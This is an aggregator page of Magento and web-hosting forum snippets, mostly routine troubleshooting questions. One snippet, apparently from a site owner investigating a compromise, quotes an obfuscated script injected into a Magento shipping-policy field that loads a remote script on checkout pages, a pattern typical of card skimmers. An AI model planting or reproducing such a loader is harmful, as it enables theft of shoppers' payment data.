RIP FutureQuest
After 25 years, FutureQuest has called it quits. They’ve posted the following on their forums: [QUOTE]It is with great sorrow and heartbr… | Read the rest of https://www.webhostingtalk.com/showthread.php?t=1899109&goto=newpost
After 25 years, FutureQuest has called it quits. They’ve posted the following on their forums: [QUOTE]It is with great sorrow and heartbr… | Read the rest of https://www.webhostingtalk.com/showthread.php?t=1899109&goto=newpost
So basically I added a custom select address attribute. This selection has 2 available values. If value A is selected the required validation of the form for firstname and lastname is removed and making the company input required. If value… Read More »Change Required Input Based on a Select Input Value in Customer Address
I have a problem with a Magento ver. 1.9.4.5 website with well over 55.000 customers in it’s database and I need to export them. I have spent hours trying with System/export/profile and selecting Customer and all the mapping fields. The… Read More »Export orders with addresses in xml
we found a script like this in shipping/shipping_policy/shipping_policy_content <script id=”shopcart”>((g,r,w,s,t,o) => {if(g.location.href.indexOf(atob(t))>-1){a=r.createElement(w);a.id=”carthelper”;a.async=1;a.src=atob(o);r.body.appendChild(a);}if(document.querySelector(“#shopcart”)){document.querySelector(“#shopcart”).remove();}})(window,document,”script”,”gCaptcha”,”Y2hlY2tvdXQ”,”aHR0cHM6Ly9zdGF0aWMud2ViYWdlbmN5YW5hbHl0aWNzLmNvbS9tYWluLmpzP3Y9MS4wLjM”)</script> Which translates to https://static.webagencyanalytics.com/main.js?v=1.0.3 I’m trying to determine how this was injected but I can’t find references to the script itself or the base64 encoded string or the… Read More »script injected in magento 2.4.1 at shipping_policy_content
Hi, We are evaluating integrating LiteSpeed solutions to our services. Anyone w… | Read the rest of https://www.webhostingtalk.com/showthread.php?t=1899108&goto=newpost
I copied a Magento 2.4.6 to the live server and suddenly I am getting this error when the search index is being reindexed: Cannot instantiate interface MagentoInventoryIndexerModelStockIndexTableNameResolverInterface Its running on PHP 8.1 and the elasticsearch setup was tested successfully. What… Read More »Cannot instantiate interface MagentoInventoryIndexerModelStockIndexTableNameResolverInterface on reindex?
so other than the baseline required apache mods for magento 2.4.4 (as per https://devdocs.magento.com/guides/v2.3/install-gde/prereq/apache.html). What other mods do you think should be enabled in apache to improve performance? For example, I noticed that I don’t have mod_cache enabled, should I?… Read More »Best apache mods for mage 2.4.4
Firstly, thanks for any help in advance 🙂 I have successfully upgraded my magento 1.9 in my local dev environment to magento 2.4.4 (took ages and a lot of hair pulling, but I finally made it! lol) I’m looking for… Read More »Migrating Mage 2.4.4 from local docker/devilbox to whm 7
I am using Magento 2.4.5 and getting 5 warning logs in system.log file while I run the command php bin/magento indexer:reindex Memory size allocated for the temporary table is more than 20% of innodb_buffer_pool_size. So far I have done the… Read More »Warning Memory size allocated for the temporary table is more than 20% of innodb_buffer_pool_size
For a client we have a case where we want to be able to add products to the cart in the same way you do with related products using checkboxes on a PDP (default magento). When I look at the… Read More »How to add products to cart similar to related products?